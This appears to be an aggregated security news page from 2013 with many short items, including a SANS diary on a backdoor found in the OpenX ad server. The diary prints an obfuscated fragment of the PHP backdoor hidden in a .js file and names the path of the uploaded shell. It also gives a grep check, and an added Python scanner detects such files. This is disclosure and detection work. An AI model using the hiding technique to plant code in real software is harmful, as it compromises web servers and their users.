Hackin9

Would you want your child to grow up to work in InfoSec?
Network World (blog)
During my recent trip to Las Vegas for Black Hat I once again heard a lot of frustration from my fellow InfoSec people about the challenges of security incidents that seem to scream from our headlines every day. For a certain segment of the industry it ...

 

Last week, when Ars first reported a new hack attack that plucks e-mail addresses and certain types of security credentials out of encrypted pages, we warned the fixes wouldn't be easy. Sure enough, Web app developers responding to the attack known as BREACH have begun proposing mitigations that are awkward, if not downright unpleasant.

The most unpalatable recommendation came from the official maintainers of Django, a popular Web framework that's perhaps second only to Ruby on Rails. In an advisory published Tuesday, they recommend website operators disable data compression in responses sent to end users. The compression, which is often considered crucial to conserve bandwidth and the time it takes browsers to load Web pages, may be turned off either by disabling Django's GZip middleware or by modifying configuration settings in the underlying Web server application.

"We plan to take steps to address BREACH in Django itself, but in the meantime we recommend that all users of Django understand this vulnerability and take action if appropriate," the advisory states.



 

The Trials of Bradley Manning
Truth-Out
There was no security to speak of at the SCIF (sensitive compartmented information facility) at FOB Hammer, where the "infosec" (information security) protocols were casually flouted with the full knowledge of supervisors. This was not an anomaly: 1.4 ...

 
More cloud vendors are adding backup to the choices they offer customers, letting enterprises that embrace the cloud for applications, computing and storage also go there for business continuity.
 
Hoping to generate more apps for its mobile platform, Microsoft has launched an online tool that could allow even non-developers to create new programs for Windows Phone 8.
 

Firefox 23, released today, contains the usual mix of security work, standards conformance improvements, and minor bug fixes that we've come to expect from the regular browser releases. On top of these, it sports a trio of changes that you might actually notice.

Most visibly of all, Firefox has a new icon. Don't worry—the lovable firefox is still embracing the globe and still has its back rudely turned towards us. The blue marble is, however, much less shiny than it once was.

The other changes are both important for their security implications. First, Firefox at last follows the lead of Internet Explorer and Chrome, blocking mixed use of (non-secure) HTTP content from (secure) HTTPS pages.



 
IBM Java CVE-2013-3009 Unspecified Arbitrary Code Execution Vulnerability
 

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

 
Twitter

Twitter has unveiled a new login verification feature that largely replaces the two-factor authentication system it rolled out in May to prevent a rash of password phishing attacks hitting its users.

The new system relies on strong encryption to provide iOS and Android smartphone users with an end-to-end solution that's not vulnerable to compromised SMS delivery channels. Unlike the current system, it also does away with the use of a "shared secret" between end users and Twitter, since the secrets are often just as vulnerable as passwords to phishing and other types of attacks. The cryptographic key used to approve login requests stays on a user's phone and is managed by the Twitter app itself. In addition to being more resistant to attack, the system is easier to use, company officials said.

"Now you can enroll in login verification and approve login requests right from the Twitter app on iOS and Android," Twitter security engineer Alex Smolen wrote in a blog post published Tuesday. "Simply tap a button on your phone and you're good to go. This means you don't have to wait for a text message and then type in the code each time you sign in on twitter.com."



 
According to the latest numbers from TrendForce, NAND flash sales amounted to $5.7 billion last quarter, a quarterly increase of more than 11% and a 30% year over year rise.
 
Mozilla and Google have updated their browsers with features to help developers more effectively write and debug their websites.
 
SAP has given customers a peek into how it will compete with the likes of Oracle and IBM in the growing market around CEM (customer experience management) software with the acquisition of commerce software vendor Hybris.
 
IBM will license designs of the Power microprocessor architecture to other companies including Google, in an effort to expand use of the architecture and reverse declines in its systems hardware business.
 
U.S. government agencies are exploring new ways to provide incentives for private companies to invest more money in cybersecurity, President Barack Obama's administration has announced.
 
As NASA celebrates the rover Curiosity's first year on Mars, scientists made it clear that the space agency's interest in the planet is only ramping up.
 
Re: XSS vulnerability in guestbook-php-script
 

Researchers release tool to pickup the SLAAC in Man-In-The-Middle attacks ...
Network World
Not too long after RFC 6104 was drafted, InfoSec Institute researcher Alec Waters outlined how to carry out Man-in-the-Middle (MITM) attacks via the problems with SLAAC, which gained some attention in both the media and the security community.

 
Google's new Nexus 7 tablet held up better than the iPad Mini and the original Nexus 7 in durability tests performed by Square Trade.
 
Twitter today simplified account security with an enhancement that lets customers approve two-factor authenticated log-ins from inside their iOS and Android mobile apps.
 
Facebook is tweaking its News Feed to help users spot popular posts that they might have missed.
 
There's no shortage of speculation about why Amazon founder Jeff Bezos is buying the Washington Post. It could be for access to local news, content deals involving the Amazon Kindle, political self-interest or even ego.
 
[CVE-2013-2136] Apache CloudStack Cross-site scripting (XSS) vulnerability
 
The National Institute of Standards and Technology (NIST) has announced more than $2.3 million in Phase I and Phase II Small Business Innovation Research (SBIR) awards to 13 U.S. small businesses. SBIR awards provide funding to help ...
 
IBM has told U.S. employees and executives in two of its business units that they will be furloughed for one week in late August.
 
Xerox scanners have been found to randomly alter numbers on documents when reproducing them if a certain combination of image quality and compression setting is used.
 

If you installed the OpenX ad server in the past nine months, there's a chance hackers have a backdoor that gives them administrative control over your Web server, in many cases including passwords stored in databases, security researchers warned.

The hidden code in the proprietary open-source ad software was discovered by a reader of Heise Online (Microsoft Translator), a well-known German tech news site, and it has since been confirmed by researchers from Sucuri. It has gone undetected since November and allows attackers to execute any PHP code of their choice on sites running a vulnerable OpenX version.

Coca-Cola, Bloomberg, Samsung, CBS Interactive, and eHarmony are just a small sampling of companies the OpenX website lists as customers. The software company, which also sells a proprietary version of the software, has raised more than $75 million in venture capital as of February 2013.



 
Chasys Draw IES CVE-2013-3928 Multiple Remote Buffer Overflow Vulnerabilities
 
A Chinese hacker gang whose malware targeted RSA in 2011 infiltrated more than 100 companies and organizations, and even probed a major teleconference developer to find new ways to spy on corporations.
 
Ron Meyran, Radware's director of security solutions, answers our questions about DoS attack planning and execution.
 

The Latvian government says it will extradite a 28-year-old man accused of creating the Web injects for the highly destructive Gozi malware, which targeted over a million computers globally, specifically aimed at bank accounts. US prosecutors say the malware was used to steal millions of dollars from its targets.

According to the Associated Press, Latvian ministers voted Tuesday (7 to 5, with one abstention), to extradite Deniss Calovskis to the United States. Calovskis has previously denied involvement in the Gozi operation.

“I am like a hostage in this situation,” he said in an August 3 interview with Latvian television, according to Bloomberg. “I don’t know about the Gozi virus. I haven’t helped any schemers to get money and I haven’t received any.”



 
[ MDVSA-2013:209 ] subversion
 
LinuxSecurity.com: A vulnerability has been found and corrected in subversion: The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) [More...]
 
LinuxSecurity.com: Updated libtiff packages fix security vulnerabilities: A heap-based buffer overflow flaw was found in the way tiff2pdf of libtiff performed write of TIFF image content into particular PDF document file, in the tp_process_jpeg_strip() function. A remote [More...]
 
LinuxSecurity.com: A vulnerability has been found and corrected in samba: Integer overflow in the read_nttrans_ea_list function in nttrans.c in smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before 4.0.8 allows remote attackers to cause a denial of service [More...]
 
LinuxSecurity.com: New bind packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, 14.0, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New samba packages are available for Slackware 13.1, 13.37, 14.0, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New httpd packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, 14.0, and -current to fix security issues. [More Info...]
 
Joomla! 'lang' Parameter Cross-Site Scripting Vulnerability
 
[ MDVSA-2013:208 ] libtiff
 
Multiple Cisco Products CVE-2013-0149 Remote Security Bypass Vulnerability
 
Opscode's Chef packs the power of Ruby and plentiful Cookbooks, but lacks features and polish found in other solutions
 
When the CIA opted to have Amazon build its private cloud, even though IBM could do it for less money, a tech soap opera ensued. Lost amid the drama, though, is a perfectly reasonable explanation why Amazon Web Services makes sense for the CIA, and why a disruptive AWS represents the future of the cloud.
 


 
[ MDVSA-2013:207 ] samba
 

Wisegate offers CISOs vendor management tips
HealthITSecurity.com
A Director of InfoSec from a Fortune 100 company said that the market has essentially become saturated and it's a chore dealing with a large number of vendors that may have different specialties. “I counted up the different vendors and we had over 40 ...

 
Reacting to reports of at least one death in China linked to a counterfeit power adaptor, Apple on Monday announced a program that discounts authentic replacements by nearly 50%.
 
A tailored LinkedIn application is now available for the Nokia Asha 501 as well as a number of other Asha devices, as Nokia works to expand the social capabilities of the phone range.
 
Enterprises that rely on cloud-based services are getting more options for falling back on another cloud if necessary.
 
Amazon has launched Amazon Art, a marketplace that includes more than 40,000 works of art by the likes of Norman Rockwell and Claude Monet from over 150 galleries and dealers.
 
Samba CVE-2013-4124 Local Denial of Service Vulnerability
 
Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
 

According to a post by Heise Security, a backdoor has been spotted in the popular open source ad software OpenX [1][2]. Apparently the backdoor has been present since at least November 2012. I tried to download the source to verify the information, but it appears the files have been removed.

The backdoor is disguised as PHP code that appears to create a jQuery JavaScript snippet:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2';
*/$j='ex'./**/'plode'; /* if(this.className ...

Heise recommends searching OpenX's ".js" files for PHP code to find out whether your copy of OpenX is the backdoored version:

find . -name \*.js -exec grep -l '<?php' {} \;

The backdoor can then be used by an attacker to upload a shell to www/images/debugs.php. We have seen in the past several web sites that delivered malicious ads served by compromised ad servers. This could be the reason for some of these compromises.

If you run OpenX:

  • verify the above information (and let us know)
  • if you can find the backdoor, disable/uninstall OpenX
  • make sure you remove the "debug.php" file
  • best: rebuild the server if you can
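A defender-side version of Heise's check, written here as an added example (it is not ISC's, Heise's or OpenX's code): it walks a web root, flags every .js file containing a PHP open tag, and reports whether the dropped-shell path named above exists. It goes slightly beyond the one-line find/grep by also matching the short "<?=" tag, which the grep for '<?php' would miss. The sample files it builds are constructed for the demonstration, and the directory layout (js/, www/images/) is an assumption rather than OpenX's real tree.

```python
import os
import re
import tempfile

# PHP open tags: "<?php" and the short echo tag "<?=". Legitimate JavaScript
# contains neither, so any match in a .js file deserves a manual look.
# Matching "<?=" is an addition to the page's '<?php' grep (assumed useful).
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def js_files_with_php(root):
    """Return sorted, root-relative paths of .js files that contain a PHP open tag."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    content = fh.read()
            except OSError:
                # Unreadable file: skip rather than abort the whole scan.
                continue
            if PHP_OPEN_TAG.search(content):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def dropped_shell_present(root, relpath="www/images/debugs.php"):
    """True if the path the backdoor is reported to drop a shell at exists under root."""
    return os.path.isfile(os.path.join(root, *relpath.split("/")))


# Constructed sample files (not real OpenX code): one clean jQuery-style file and
# one carrying a PHP block in the style of the snippet quoted in the diary above.
CLEAN_JS = b"jQuery.tools = jQuery.tools || {version: {}};\n"
BACKDOORED_JS = (
    b"this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)\n"
    b"{jQuery.tools=jQuery.tools||{version:{}};\n"
)


def build_sample_tree():
    """Create a throwaway directory tree (assumed layout) with the two sample files."""
    root = tempfile.mkdtemp(prefix="openx_demo_")
    os.makedirs(os.path.join(root, "js"))
    os.makedirs(os.path.join(root, "www", "images"))
    with open(os.path.join(root, "js", "jquery.tools.js"), "wb") as fh:
        fh.write(CLEAN_JS)
    with open(os.path.join(root, "js", "flashembed.js"), "wb") as fh:
        fh.write(BACKDOORED_JS)
    return root


def plant_dropped_shell_marker(root):
    """Create an empty placeholder at the dropped-shell path so the second check fires."""
    path = os.path.join(root, "www", "images", "debugs.php")
    open(path, "wb").close()
    return path


if __name__ == "__main__":
    # Point this at a real OpenX web root instead of the sample tree to run the check.
    demo_root = build_sample_tree()
    print("PHP found in .js files:", js_files_with_php(demo_root))
    print("debugs.php present:", dropped_shell_present(demo_root))
```

Run it against the actual web root rather than the sample tree; any .js file it lists should be compared against a known-clean copy of the same OpenX release before deciding the install is clean.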

Heise investigated a version 2.8.10 of OpenX with a date of December 9th and an md5 of 6b3459f16238aa717f379565650cb0cf for the openXVideoAds.zip file.

[1] http://www.heise.de/newsticker/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html (only in German at this point)
[2] http://www.openx.com

------ 
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter @johullrich

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
IBM has introduced x86 and Power processors with a new dual-chip server module that will help speed the deployment of cloud and virtualized environments.
 
BMC is continuing its push into the consumerization-of-IT trend with the acquisition of Partnerpedia, which makes software companies can use to roll out secure, governed app stores to their end users. Terms of the deal, which closed last month, were not revealed.
 
The TOR Project is advising that people stop using Windows after the discovery of a startling vulnerability in Firefox that undermined the main advantages of the privacy-centered network.
 
Apple saw a dip in its smartphone market share in China as the company was overtaken by local rival Xiaomi, a seller of low-priced handsets that has been making waves in the country's tech industry.
 
[slackware-security] bind (SSA:2013-218-01)
 
[slackware-security] samba (SSA:2013-218-03)
 
[slackware-security] httpd (SSA:2013-218-02)
 
After one year on Mars, the NASA rover Curiosity is changing the way we look at our solar system, and it may change how we look at ourselves.
 
The largest supercomputer in the world may be a top secret, as the specs of U.S. spy agencies are classified. Nonetheless the top U.S. spy agency is publicly seeking help to build superconducting computers, which may offer the best path to exascale.
 
SocialEngine 4.5 TimeLine 4.2.5p9 upload file "PHP" in the Cover Image
 
Usernoise 3.7.8 WP plugin cross-site scripting vulnerability
 
Re: Joomla core <= 3.1.5 reflected XSS vulnerability
 
[SECURITY] [DSA 2734-1] wireshark security update
 
Multiple Schneider Electric Products XML External Entity Information Disclosure Vulnerability
 

Hacker Halted USA to Feature Top Industry Keynotes & Over 50 Hacking Experts ...
PR Web (press release)
EC-Council's premier security event, Hacker Halted USA, brings infosec professionals from across industries, around the world, and at all levels to converge in one event to discuss the biggest threats to the world's cybersecurity. From hackers to ...
